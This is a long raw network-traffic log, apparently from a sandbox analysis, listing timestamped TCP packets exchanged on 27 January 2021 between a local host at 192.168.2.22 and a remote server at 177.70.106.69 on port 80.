                                                                                                                                                                                  Jan 27, 2021 06:51:27.802617073 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802619934 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802656889 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802659035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802673101 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802692890 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802716970 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802723885 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802748919 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802755117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802772045 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802787066 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802802086 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802817106 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802849054 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802855015 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802877903 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802898884 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.804600000 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.805557966 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051520109 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051563025 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051599026 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051635027 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051671982 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051721096 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051763058 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051799059 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051836014 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051832914 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051870108 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051875114 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051891088 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051914930 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051940918 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051953077 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.051954985 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.052015066 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.052948952 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.052994967 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053024054 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053034067 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053061008 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053081989 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053093910 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053127050 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053143024 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053168058 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053189993 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053206921 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053226948 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053248882 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053272963 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053292036 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053317070 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053330898 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053364992 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053376913 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053420067 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053430080 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053452015 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053494930 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053515911 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053534985 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053560019 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053571939 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053592920 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053611994 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053630114 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053652048 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053683996 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053714037 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053747892 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053762913 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053781033 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053808928 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053822994 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053847075 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053873062 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053888083 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053913116 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053925037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053927898 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053966045 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.053982973 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054003954 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054018021 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054042101 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054058075 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054089069 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054091930 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054131985 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054151058 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054169893 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054172039 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054208040 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054224014 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054246902 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054251909 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054285049 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054303885 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054325104 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054330111 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054363012 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054379940 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054411888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054419041 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054455042 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054469109 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054493904 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054507971 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054533958 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054541111 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054574013 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054589033 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054611921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054611921 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054650068 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054665089 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054688931 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054693937 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054737091 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054744959 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054780006 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054796934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054820061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054838896 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054874897 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054876089 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054919004 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054934025 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.054972887 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.056135893 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.059870958 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.059911966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.059957981 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.059995890 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.059999943 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060020924 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060059071 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060266018 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060305119 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060339928 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060342073 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060374022 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060384035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060420036 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060421944 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060456038 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060461044 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060482979 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060499907 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060519934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060544968 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060545921 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060590029 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060606956 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060626984 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060641050 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060667038 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060688972 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060704947 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060714960 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060743093 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060765028 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060781956 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060798883 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060820103 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060842037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060868025 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060885906 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060913086 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060935020 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060950041 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060976028 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.060997963 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062005043 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062047958 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062084913 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062114954 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062124968 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062153101 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062180996 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062186003 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062211990 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062223911 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062243938 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062264919 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062272072 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062314034 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062342882 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062351942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062378883 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.062421083 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064372063 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064404964 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064434052 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064438105 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064464092 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064488888 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064493895 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064497948 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064522982 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064523935 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064542055 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064554930 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064562082 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064587116 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064606905 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064624071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064641953 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064659119 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064681053 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064690113 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064713955 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064722061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064744949 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064744949 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064771891 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064778090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064790964 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064810038 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064840078 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064850092 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064872026 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064881086 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064901114 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064913034 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064918995 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064944029 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.064973116 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065005064 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065011024 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065023899 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065033913 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065037012 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065052986 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065068007 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065074921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065099955 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065119028 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065129042 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065151930 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065161943 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065181017 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065184116 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065217018 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065221071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065229893 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065254927 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065270901 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065285921 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065304995 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065316916 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065339088 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065347910 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065376997 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065406084 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065419912 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065422058 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065428972 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065452099 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065474033 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065480947 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065511942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065511942 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065530062 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065541983 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065556049 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065573931 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065597057 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065606117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065627098 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065628052 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065659046 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065668106 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065671921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065701962 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065718889 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065732002 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065762043 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065762997 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065783024 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065793037 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065809011 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065823078 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065845966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065845966 CET4916680192.168.2.22177.70.106.69
